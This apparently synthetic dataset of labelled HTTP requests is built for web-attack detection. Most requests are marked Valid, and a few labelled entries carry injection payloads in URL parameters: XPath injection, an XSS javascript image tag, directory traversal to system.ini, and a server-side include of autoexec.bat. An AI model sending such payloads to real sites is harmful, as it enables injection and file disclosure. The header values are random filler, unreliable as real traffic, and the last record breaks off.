GET /rzlp/ie-@zmRQIfNGXWOG2v8e/lnjEF1eVZed8/spsp2JhNMnj/bhier32mAgSomi.shtml?xmts=%3C%21--+++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&6leThYeC6bn6seI=%5Bopen&PjtsystemDQFshutdownAb=eshpwesaeln9ninel&SXItp%u=tmp&NShrteinrdn9m=ikc5hsY+&enns5t=cydnObJ3AG&QhbieybeI=one%27jhomezacrinIx&cAias4ae=1%40u&rEm0=oaO%40a7aU9UR&rusxtnhniai71=sror&oVOjsystemAhphp=hi&pOmWtU5l=xqcQlmv12W&IcnV2efcz9t=style&rGmEh.F=fdn%3Ee47hx+fe HTTP/1.1
Host: www.po88.be
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987, iso-8859-2;q=0.5, x-mac-turkish, iso-8859-15;q=0.6, windows-1258;q=0.6
Accept-Encoding: 
Accept-Language: aet-ri4a6;q=0.0, rx-fq;q=0.9
Cache-Control: srpdti='d7xEx'
Client-ip: 233.63.57.74
Cookie: rmmif1etUs=rVe;atehrn=b/ebrm6l5b rtnobr;rtfEcsdaais2ol=y8a6helqdmetcteh6
Cookie2: $Version="59"
Date: Wed, 08 Nov 06 06:49:12 GMT
ETag: "jR2HfL@EpDJOH8a"
Expect: e7eTihs
From: phta9t@exney5i.com
If-Modified-Since: Sun, 29 Apr 07 08:10:30 GMT
If-Unmodified-Since: Tue, 01 Nov 05 18:01:10 CET
If-Match: ".F048NzyNjE88MVs"
If-None-Match: "aAxbXDLNEmZPvD1fX"
If-Range: Tue, 28 Aug 07 17:46:37 CET
Max-Forwards: 322
MIME-Version: 4.5
Pragma: netmPrxh=im
Proxy-Authorization: NTLM OXJ3bGd1ZWFnZWVTbnRzMHhpT3dlYmI2bzZweXR0TGY=
Authorization: Basic ZGNhdG50bzpzQW9lZXJ5bw==
Range: -52,238-2637
Referer: http://nJhedm.st/ozgkr/uh9ahfec/XeNhohaa/6pHvEmr/eEti3e.swf
TE: chunked;q=0.2,deflate
Trailer: Max-Forwards
User-Agent: aXN8DxqYTu http://www.enti3ed.de
UA-CPU: MIPS
UA-Disp: 5153,3619,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1239x334
Via: HTTP/3.9 80.173.189.193, 3eA/8.3 www.nhRatnlp.css
Transfer-Encoding: deflate
Upgrade: dwen/0.1
Warning: 706 www.8omhtse.shtml "seeiifggsn7jjfoai" "Fri, 07 Dec 07 06:30:57 GMT"
X-Forwarded-For: 93.190.193.214
X-Serial-Number: 61054598804485092045
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40529
Start - Id: 12521
class: Valid
GET /sCeier2eicer/oToghnbsOe6fkwe/hLEeT5Xm15M.yzHWOP/ozx1_HwaiY3K.t@/sCX-/tfaueAdceur/IfneAeona8vsiroq8oT/9ptb5s/Bjlnrhfo/ii_1CX1EAiaLU09Cm/atpltiamGls.shtml?gghi=02541&onoNuped=ay_kxH4OmP&shernez=jlmfK&TNi=02024&kaaceNaagbexz=7v9Vqp. HTTP/1.0
Host: www.tkinlhpise.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 231.2.43.204
Cookie: ciereMnno=70387;RpsiseR2wfioR=aRgwGG;LtYIXJQ=sacmoxntTsncyR;moxeSde=nxyw;7sektete=36578;rothetttn=fenq44A
Cookie2: $Version="26"
Date: Fri, 15 Feb 08 24:44:26 CET
ETag: W/"GB0yHjmBx9u.vEVCifDl"
Expect: 100-continue
From: deAe@iiia.st
If-Modified-Since: Fri, 25 Jul 08 24:32:28 GMT
If-Unmodified-Since: Thu, 04 Dec 08 17:31:17 GMT
If-Match: "SqPwJyTZUVSMBoI"
If-None-Match: "wm_gB8p9P.rkvDwpe-"
If-Range: "bAu8Tlj9AZ5VbRY6iULe"
Max-Forwards: 05
MIME-Version: 4.4
Pragma: eyhth=t
Proxy-Authorization: Digest qop=tlainatN
Authorization: Basic YWh0ZWVveWk6ZHVlb3N0cGU=
Range: 1-
Referer: http://www.l7acnrz.biz/kdrEJ/nebj/roswerw/7acg/i5oiinrb.php3
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: ejrnlonv (4FO_1hupBW)
UA-CPU: Sparc
UA-Disp: 3658,3398,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 580x349
Via: HTTP/1.3 121.113.57.189, 3.3 214.74.84.72:01867
Transfer-Encoding: gzip
Upgrade: AGSes/3.1
Warning: 308 212.140.37.183 "tnstnwlHnrwl" 
X-Forwarded-For: 44.18.78.71
X-Serial-Number: 2197491883894
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12521
Start - Id: 22839
class: Valid
GET /rihsger/zSfk/hKSIJmGcQIo1Lf/jhszto.cgi?AecIiu=h9 HTTP/1.0
Host: www.eehlQhee8.org
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874;q=0.4, euc-cn, x-mac-japanese, iso-8859-8-i
Accept-Encoding: 
Accept-Language: lsutsrdr-9btwmdp;q=0.6, w-iyv;q=0.1
Cache-Control: max-stale
Client-ip: 39.158.127.75
Cookie: d9eh=870328
Cookie2: $Version="94"
Date: Sat, 01 Apr 06 04:27:17 UTC
ETag: "a_aMJOhUcEIiw0nque"
Expect: fltD89
From: trsehe0n@ajce.be
If-Modified-Since: Thu, 08 Jun 06 04:58:25 UTC
If-Unmodified-Since: Sun, 23 May 04 03:48:30 GMT
If-Match: *
If-None-Match: "iMxl3FPnzJ1axfE."
If-Range: *
Max-Forwards: 7232
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM YXNucmlkZW5uaXJuaGNzcGVuZHM5c29zZW1ycmVlZXVpb2RJck5hdHU1cjJpRQ==
Authorization: ta3nN8 eoeehzo=eeatdu
Range: 1016-,1-936,-4477
Referer: http://hanhga.be/AdLCie/ieeo/sLagxmmu.nsf
TE: deflate;q=0.7,trailers,gzip;q=0.7
Trailer: Referer
User-Agent: m2unrcksu
UA-CPU: MIPS
UA-Disp: 7850,134,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 134x6878
Via: FTP/1.2 www.lsBts.gif, 2.5 www.nTasnr.html
Transfer-Encoding: compress
Upgrade: hrnaea/8.0, Re4t/7.6, 7c4/1.7, 3hq/6.9
Warning: 074 www.hinto2h.jpg "ook3DdrfoneeEfR" "Tue, 07 Aug 07 08:42:59 GMT"
X-Forwarded-For: 207.142.89.78
X-Serial-Number: 8712140
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22839
Start - Id: 2611
class: Valid
GET /lpouwh1c2IScen/lwvD1B_r/nSiEqtSHoewao.gif? HTTP/1.1
Host: 153.83.254.144
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eo7cr-ieteszr, 6fowdeu-1tqdhohR, uNo-satpta;q=0.6, tsqs4-o, anneY1v-wrs
Cache-Control: no-transform
Client-ip: 16.249.92.210
Cookie: mpc0tseuepechi=9012360;rt=l4tsoa5r saw;tiau1hprtir2s=var3TA
Cookie2: $Version="756"
Date: Thu, 11 Nov 04 01:18:47 UTC
ETag: "1IMb7ktjvvu5X5Xy"
Expect: 100-continue
From: leejhr@sitc4ia.cz
If-Modified-Since: Sun, 29 Aug 04 06:15:18 UTC
If-Unmodified-Since: Sun, 09 Apr 06 23:54:35 GMT
If-Match: *
If-None-Match: "upP9yhXgWgtLs8UGXk"
If-Range: "31DK_Ef5u7-M2R5O4"
Max-Forwards: 30
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic YXpvaG1uOmRualRveDU=
Authorization: NTLM c2VzOG83aUVvYXJsdGVjZmVsZWZ1ZWx0bXJudHk4OVY0aW5s
Range: 358055-4261
Referer: http://jZdiul.fr/47trs1.sh
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/0.3 (X11; U; Linux i386 2.9; tn-6s; rv:1.7.4) Gecko/43915964
UA-CPU: x86
UA-Disp: 5183,3355,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 9.1 72.48.195.24, 4.5 178.248.80.207
Transfer-Encoding: compress
Upgrade: dmba/7.6
Warning: 490 www.edeoica.css "irieceeHr1udvocili" "Sat, 01 Apr 06 08:34:39 GMT"
X-Forwarded-For: 35.160.78.10
X-Serial-Number: 9671188655936
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2611
Start - Id: 21098
class: Valid
GET /THstiaos/dgRjic.XfHl2NQx/atE8139xz_g77bUQac./haensA8el5vIemhsd/aPs2G7TBX.1170C4Q8/mersX8eisNcnm8aai/heedI10eNfEisosr0j/hI-YaCq9Zd-Vb/wietaIoeoeglehtnrc/orrma.tiff? HTTP/1.0
Host: www.tcavlnRuo.uk
Connection: u8nc6e
Accept: */*
Accept-Charset: x-mac-ce, x-mac-hebrew, iso-8859-3;q=0.6, windows-1251;q=0.8
Accept-Encoding: deflate, deflate;q=0.0, identity;q=0.2, gzip;q=0.9, deflate;q=0.3
Accept-Language: teEfoh-p, ondh-Rotnz1s, reemeO-tra;q=0.5
Cache-Control: only-if-cached
Client-ip: 17.103.228.226
Cookie: f2scNodttjnrdth=477570;ihnrmi=1;gGLW=A&tmptttc=so;o3nt3s=9526;ei1ehQeetps=A tojm mk@b;sndhriijtwoce=s1X
Cookie2: $Version="0"
Date: Tue, 23 Jun 09 05:02:17 GMT
ETag: W/"ftGWEArrI0_-kyK"
Expect: uwlSsit=ol2ea
From: esr8neue@emIt.biz
If-Modified-Since: Mon, 20 Aug 07 10:37:00 CET
If-Unmodified-Since: Thu, 07 Sep 06 01:29:48 GMT
If-Match: *
If-None-Match: "MrdTJN@w.GHKSlD9NOB"
If-Range: Tue, 15 Sep 09 21:10:10 CET
Max-Forwards: 7
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: nath o2h1E=5lEosz
Authorization: Basic T2UxczpIT2tlMw==
Range: 72-,4-191
Referer: /Moeaut.jsp
TE: trailers,gzip
Trailer: If-Range
User-Agent: fEieeVsf (ohp-gU; wM-9GEzDkY; aMlY_ndp; 45074dz)
UA-CPU: x86
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: han/1.9 108.243.82.101, ndifoh/6.4 www.wCta.css
Transfer-Encoding: gzip
Upgrade: ochnm/4.8, 7fb2al/4.6, nnde/0.6, Oii67o/1.6, btqoia/9.7
Warning: 378 www.dbe0v.htm:43 "fcfyaasnjAgaFes4ea" 
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 62118973546819667200
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21098
Start - Id: 11715
class: Valid
GET /shpt8p/epsgly/nvfIzW/okrMsgtroifis/enode/NQZ5Knull/rzNF4xafl/rquNktbwAe/HG-AzXsamc/m0TsjiteAtsIrpgasc.tiff?Nnn=5&8t=sidoiCh9i&u7atatiit=oid%3Ehnt3iframe&7ooredktaytobae=90581191&9W1ln=osooplphroI86j2d7f&lw9w6=5sdi9rs8Pr&deOdoy=udjkTOuroyt&autoexecsRZ_autoexecetchtpassa=3qB4z4&4st2iLyaio=meq&JEGLHhZallp=wiifn1e7ueedefs&r2ig=de8aneu HTTP/1.1
Host: www.2rchsdnu.org
Connection: keep-alive
Accept: audio/*, application/*;q=0.0, audio/*
Accept-Charset: *
Accept-Encoding: compress;q=0.8, identity;q=0.1, identity;q=0.0, gzip;q=0.6
Accept-Language: *;q=0.5
Cache-Control: max-age=52660
Client-ip: 19.136.54.80
Cookie: e3=e4-
Cookie2: $Version="63"
Date: Fri, 17 Oct 08 14:52:57 GMT
ETag: "XPJwXZdQxVbMljj49"
Expect: 100-continue
From: lAuala@v9ti4o.be
If-Modified-Since: Sun, 05 Oct 08 20:03:01 GMT
If-Unmodified-Since: Sun, 14 Feb 10 22:01:09 GMT
If-Match: "ola3YAQP87v5UTI1X_"
If-None-Match: "8eMJKGgd91kim.tktCrc"
If-Range: Mon, 19 Jan 04 19:58:07 CET
Max-Forwards: 74
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://iyoaifI.uk/iwiidi/dstccor/hJfiiG/uAtcheam/Lnrl.doc
Authorization: NTLM cnloc21lZGs4ZWN0MExyVGVvdW4zd2FodHlhbjB5dXRlaW5lc2Q3ZWlvcw==
Range: -63,010806-6
Referer: http://utIi.com/ei9tyc.jpeg
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.5 (Machintosh; U; Mac OS X 4.8; rt-no; rv:7.1.2) Gecko/13201495
UA-CPU: x86
UA-Disp: 627,463,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8474x4418
Via: FTP/9.5 www.tredet.jpeg, HTTP/8.4 32.80.242.33, HTTP/2.1 www.tcuehnuw.gif
Transfer-Encoding: gzip
Upgrade: tg2r/9.0, fere/5.1, Samd/0.1, iasFl/4.6
Warning: 508 www.Wowebu.shtml "eitda3tdi4a9" "Wed, 29 Mar 06 15:01:52 GMT"
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 089001831112
----: ----------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11715
Start - Id: 49715
class: XPathInjection
GET /nmBP2QI8ZrwPg897d/uXsR3au/nsaarwPeod0h/lhbWVy4w/rRQnxPlRd2/aekedpS/s_XWFgj/EtsaAmithEdh7thefem/PNJVxterm/d9jtt3rtJbdmwinVn/anu78.shtml?ts=oLIV0DG%40Y&ae9ltsenIhmtair=0&ftnaemvonnnash=ennec13Lsph&6hymculftac=di8tlvetyA9g23b&eshto=+zOh&RthsrmeEarree0c=rQVLR5rK&d6henhui8menlr=070308424&iwasNbttknnesDI=kydL.H80qB&Eem=7++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++199%3D&r2p0h=g0qgam%25uh2nttmwlocation&7yoolnutkoueerz=unionol&bur=ehuai33pS HTTP/1.0
Host: 178.226.11.31
Connection: close
Accept: */*;q=0.3
Accept-Charset: isiri-3342;q=0.8, windows-1250, iso-8859-6
Accept-Encoding: identity;q=0.6, compress;q=0.5, identity, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 108.36.71.41
Cookie: yut=e_@s.WGsu0t5
Cookie2: $Version="828"
Date: Fri, 14 Nov 08 10:03:28 UTC
ETag: "iITkPXqitf-bCHofqIg"
Expect: 100-continue
From: u5ln@onsTkmM.ch
If-Modified-Since: Sun, 29 Nov 09 03:35:29 CET
If-Unmodified-Since: Thu, 10 Jun 04 23:57:02 CET
If-Match: "fw3qfd3nb@EWIzK3hC"
If-None-Match: "hUUge31XwwYWv51BT7v"
If-Range: Sun, 18 Dec 05 09:49:49 GMT
Max-Forwards: 41
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Basic Yk51aW54Om9pbEVuaW10
Range: 74-4,110349-,51246-
Referer: /Trdvr/8Idct/ldoe/rtrce/ea2x.swf
TE: gzip;q=0.4,chunked,gzip
Trailer: If-Modified-Since
User-Agent: snecnd8A5S0eae
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 4.5 62.242.219.94, 8.0 www.wxapd.tiff, 2.1 38.154.240.4
Transfer-Encoding: lior4
Upgrade: hdoAgi/1.2, icsn/0.8, don/0.5
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49715
Start - Id: 47701
class: XSS
GET /iewebsgih/y9Bo92GW.PsffkF/rsr7js2e6/lB.ruT-d-At6ykQMgXm.png?d9eha=%3Cimg+++++src++++%3D++++%22+++++javascript%3A++%5Balert++%28%27caisw5%27%29%3B%5D%22%3E HTTP/1.1
Host: www.hewsU6ber.cz
Connection: nseu
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.5, compress, deflate, identity, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 29.159.169.244
Cookie: atnrrc=e;2tU@3=ssl4evalx~Yn;eiarteademlod=awSE3_AVssZ;orkspssasqca=q4KKrylZ@p;roorat9C7dcDnSi=9545077
Cookie2: $Version="6"
Date: Sun, 08 May 05 13:29:17 GMT
ETag: W/"XsttvGY924rMZZs4W"
Expect: 8nggt=Iehr
From: ntca1@4fmcsegl.gov
If-Modified-Since: Tue, 11 Nov 08 24:03:33 UTC
If-Unmodified-Since: Wed, 17 Aug 05 03:55:41 CET
If-Match: *
If-None-Match: "PrgIUeicm9SP4_DJZqA"
If-Range: "TJ.ap@zM@jj2rOoKhHxK"
Max-Forwards: 93
MIME-Version: 9.8
Pragma: Imban=eushhyi
Proxy-Authorization: NTLM b3Q2OWN3aXJkc2xycmhyaGVldGRpYXg0c2llZHR1bmhqdEdvZnNoZWhy
Authorization: NTLM dGluYW9hbHR3bm1TYUt1ZW0yaWx0SHdUaXNvcjBQbDZpdG9semtlcmxlaWd4aXpi
Range: 834-
Referer: /oryp.avi
TE: trailers,trailers,trailers
Trailer: From
User-Agent: oinuabeg1g/4.5.2
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: identity
Upgrade: 4Siht/2.2
Warning: 422 www.tsahzte.tiff "ndnheiEmueo" "Fri, 27 Jan 06 13:37:13 GMT"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 00056552698
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47701
Start - Id: 45892
class: PathTransversal
GET /h4cgElju/lkaPmTdj/9N-CnDJwzUIDu/wetsool/in.1bgsoundZz1Cpr/t2nADCYqrFOJ0i/16A8bzYt./ftphttpU/m-.mspx?nq4aMe=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&btddxeosra=4&e3ueeynds9=orbpe3b5tfEm&En=092658769&peredR2s=s%7CpwherexscriptUtmpQl7atTe%28%3Eobject&adaeeoeoakF=0 HTTP/1.1
Host: 73.88.227.87
Connection: carr
Accept: text/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 182.229.61.144
Cookie: 7aItitahs=tCeLecnx2wiieiymEc;7otrtestusdn=4>t;dslgnlAyxsvy=67
Cookie2: $Version="33"
Date: Fri, 22 Sep 06 20:54:21 GMT
ETag: "ZwJfzvdkKp@tE-KYo"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Thu, 18 Jun 09 17:18:34 CET
If-Match: *
If-None-Match: "pF96COZNMlFL-krdDdaS"
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 307
MIME-Version: 5.1
Pragma: zia2=boew3E
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest uri=http://rwr7.cz/p4hn/tem4/aybte3e/orupse.dll
Range: 58-182597,4-9
Referer: /n19lb.msf
TE: trailers
Trailer: TE
User-Agent: phasehotf/2.8.6.8
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: compress
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 121.121.166.30
X-Serial-Number: 42462997439342204016
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45892
Start - Id: 44776
class: PathTransversal
GET /9d8fxyUUjImgqQ/SjSY.XbinR/sIKW/cSetPfaslcSe.bin?dh5k3sinp=b7Ran9fo3Iduins&B9UL78=XarRoT&7ocihe7xriEe=file%3A%2F%2F%2Fi%3A%2FQohhu%2Fhdhoo%2Fusfo4.xml HTTP/1.1
Host: www.gaslR.gov:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip, identity, identity, gzip;q=0.0
Accept-Language: mN83D-3eh5Dt;q=0.6
Cache-Control: max-age=17942
Client-ip: 7.176.110.139
Cookie: nmc==E7;ntid2zdn7ds=nqienw2fPetd7abhw;lnltpenhW1rho=ehihehncld
Cookie2: $Version="7"
Date: Mon, 05 Oct 09 08:58:09 CET
ETag: W/"1moiL3zP1yW7wCq50"
Expect: 100-continue
From: iddCt@3ahi.gov
If-Modified-Since: Wed, 27 Dec 06 21:57:59 CET
If-Unmodified-Since: Sat, 09 Apr 05 10:30:57 GMT
If-Match: "fp6Z_ZBx9qsx@aE4cZ"
If-None-Match: *
If-Range: "bnHgV_xFALk0xh2v-9j"
Max-Forwards: 4
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: 6578-336232,-258470,45228-5909
Referer: /8eaoMeh/tadmg.asp
TE: trailers,deflate
Trailer: Date
User-Agent: w21osj3nux/4.5.1.3.0
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: gzip
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44776
Start - Id: 29467
class: Valid
GET /rtreTev/JPy/tioitxmisElgtaee/ozINwaetorsmNpesus/oeaRnEcp/la53SeIdpofstpbtwe.html?op=esnagbssw1re%2B&tsxiijcopo=90dtr%2Form HTTP/1.1
Host: 44.180.42.203:71
Connection: wehaas4b
Accept: */*;q=0.0
Accept-Charset: windows-1250;q=0.6, iso-8859-15
Accept-Encoding: *;q=0.7
Accept-Language: f-nwsgeeu, i-l
Cache-Control: no-store
Client-ip: 47.233.141.164
Cookie: PqnbC7zgcs=0iN53rxlsdwpiqwvtd;d1lafica3=openhtpassa;gcEgtiQs=93610;dt=824977589;4mnC7lkstA=Eshr
Cookie2: $Version="749"
Date: Sat, 26 Nov 05 03:47:52 GMT
ETag: "xLrsNsTOPTUionq"
Expect: sE4icgn
From: 3eefJz@tepiieo.org
If-Modified-Since: Mon, 22 Nov 04 15:55:47 CET
If-Unmodified-Since: Wed, 01 Jul 09 04:23:33 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Jun 05 19:34:57 UTC
Max-Forwards: 64
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: oesya nAdau=xhbeoav
Authorization: Digest nonce
Range: 79719-,-15,5725-6080
Referer: http://uniU.fr/tidsh/ou9eHi8/tQihd/Tipswr.sh
TE: trailers
Trailer: From
User-Agent: uqnncFSosaJiu
UA-CPU: Sparc
UA-Disp: 9179,2660,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6889x7208
Via: 3.2 187.167.192.13:960, FTP/3.7 252.143.94.50, HTTP/8.9 46.67.193.133
Transfer-Encoding: identity
Upgrade: s1t2mc/5.1, ien6g/6.9, eou/7.3, wnt/9.2, inbt/4.4
Warning: 434 www.3rmtd.png "yvs9tz" "Fri, 05 Aug 05 19:35:36 GMT"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29467
Start - Id: 32097
class: Valid
GET /nx.85uJ6n1bDIzKqN8/0pztASaizmen/lmt/vaoeecrcrstF0vmnssrp/oLwk0fWsK58BN.tiff?senoezSeomw=3 HTTP/1.1
Host: 76.128.19.93:297
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 158.27.187.9
Cookie: ursjhr=218;ohw5fi6ge=7@2iw;EdeleteiiHE=5etusru;osMhchhabiepsii=604961;@documentgroup bycopyQA=c8e;1ou8gAsehasmflS=liR1ETmtgN-D
Cookie2: $Version="102"
Date: Tue, 26 Jan 10 05:35:41 UTC
ETag: "D_Ls_R7aeBy36JCM7s"
Expect: znnrtj=5seob7w;erlhsae=uifl
From: snopaa@pattnfyrl.org
If-Modified-Since: Sun, 15 Jul 07 08:14:50 CET
If-Unmodified-Since: Wed, 11 May 05 07:00:03 UTC
If-Match: *
If-None-Match: "AzJF7-Pwq_2hB04"
If-Range: *
Max-Forwards: 6493
MIME-Version: 6.6
Pragma: on3='newl0et'
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Basic aW95b2VuOlR1c2htbA==
Range: 130281-,-02625
Referer: /yctoaa/ho8tdde.pdf
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 1.6; o2-bI; rv:8.8.9) Gecko/49983184
UA-CPU: 68000
UA-Disp: 702,413,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 367x7496
Via: HTTP/3.1 www.8ieaxi4.html
Transfer-Encoding: odh8; 5enoa17=oeue
Upgrade: t5fge/4.8, acN/4.6, beene/4.1, lalr/2.9
Warning: 004 www.catate.tiff "0rpajihlso" "Sat, 13 Jan 07 04:30:39 CET"
X-Forwarded-For: 111.76.107.196
X-Serial-Number: 4047270
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32097
Start - Id: 14803
class: Valid
GET /uh/fil6lsRot/Eexecrm69XQmX/mBimnmiieoEa/nteao/tSn73ao7mn/cfrLGmT/an_Q/bIgt0IjR8yneyF/uTsNFVeAG5dD8ubS/i3Z-bg0HnpqGnlzcBW/hvO9hQWo.BCsF8J2u.shtml?2We0=8hd6tr4y7JnopEz&AcZupdatel2W=5ehou HTTP/1.0
Host: www.ts1rrebhnG.be
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: b-efaAeer;q=0.5, a-t;q=0.0
Cache-Control: max-age=91257
Client-ip: 71.239.247.8
Cookie: 1http2X9nBJw=\yoitdoo5ela;3VS9=lrol2tyTE;7ii1NBeSep9=ae4i)8;l5oniccx=lTa4y;ueafe=i8g
Cookie2: $Version="24"
Date: Tue, 12 Oct 04 08:12:56 UTC
ETag: "ht4@51kpRSs3WSZa"
Expect: 100-continue
From: nOeesl@pemet.it
If-Modified-Since: Tue, 17 Jan 06 19:37:47 UTC
If-Unmodified-Since: Tue, 08 Nov 05 16:03:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM dGhpb3R2bWRuZGVFczlicm50ZW5zd2VsVGxvZW9lYXVlN2Fp
Authorization: Basic bnZyc1RvOmRZMWFh
Range: 7219-,2-25
Referer: http://www.Grr4.cz/7e2emi4l.pdf
TE: gzip;q=0.1,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: okpfdIhoeoadeie8udme
UA-CPU: MIPS
UA-Disp: 9935,4527,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1451x6345
Via: 8.1 www.tnfek.gif
Transfer-Encoding: laglef
Upgrade: 1s0oa/6.2, rar/3.6, oi9ah/7.0
Warning: 574 www.zuisfti.js "sihgc2iasu" "Sun, 21 Aug 05 05:36:33 CET"
X-Forwarded-For: 0.184.13.124
X-Serial-Number: 48297447626041948628
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14803
Start - Id: 27971
class: Valid
GET /yooiyvhsgMhrbu/swwlsNap9digslvssswn/gnhobi/icxrlyebtwpoeh7htegZ/e5oJt@xOWg5/USaWltsl0mosmL/iAWxsBB/nanmetogrNtfse/iz5Qu7ObQTiJ/cH.exe?shno=03560640&oKIBM2accept=woao5pLridiUm HTTP/1.1
Host: 77.132.90.20:5
Connection: biatrs
Accept: */*;q=0.2
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: Tuol-siv, eon-ent;q=0.6, tjectjC-ee
Cache-Control: only-if-cached
Client-ip: 37.171.143.216
Cookie: daaarsnhE=psu7kusarsiiutdlNe;oegk=/l0sock_streamczwinntVhnn21
Cookie2: $Version="9"
Date: Tue, 12 Oct 04 08:41:52 UTC
ETag: W/"ajuP5YC5yyxw6DQ7R"
Expect: jcedea7
From: aclt@ntyaoohns.cz
If-Modified-Since: Thu, 23 Nov 06 20:18:17 GMT
If-Unmodified-Since: Sat, 04 Sep 04 14:00:52 GMT
If-Match: *
If-None-Match: *
If-Range: "VW8mPYdHSLa-yH3"
Max-Forwards: 97
MIME-Version: 6.5
Pragma: eens9i='laA'
Proxy-Authorization: Digest username="eAeuolls"
Authorization: Digest qop=auth-int
